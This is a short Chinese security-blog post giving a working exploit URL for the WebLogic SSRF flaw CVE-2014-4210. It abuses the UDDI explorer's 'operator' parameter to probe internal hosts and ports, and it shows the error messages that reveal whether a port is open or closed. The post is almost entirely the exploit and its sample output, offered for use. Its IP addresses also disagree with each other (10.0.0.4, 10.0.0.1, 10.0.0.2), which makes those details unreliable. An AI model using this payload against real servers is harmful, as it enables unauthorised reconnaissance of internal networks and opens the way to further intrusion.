蜗蜗侠's Blog-关注网络安全移动版

主页 > 黑客/白帽 > WEB安全 >

Weblogic ssrf CVE-2014-4210 扫描内网主机信息

扫描内网主机信息:
exp:https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
 
通过访问exp如果10.0.0.1的22端口处于开启状态将返回
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.2:22 which did not have a valid SOAP content-type: null.   
 
访问exp如果10.0.0.1的22端口处于关闭状态将返回
An error has occurred
weblogic.uddi.client.structures.exception.XML_SoapException: Socket Closed  
 
通过返回的不同我们可以扫描内网内主机的端口情况。
 
Weblogic ssrf   CVE-2014-4210 - sn0w - 雪花 -  root@sn0w.top
 
http://www.cnblogs.com/handt/p/5502975.html

(责任编辑:蜗蜗侠)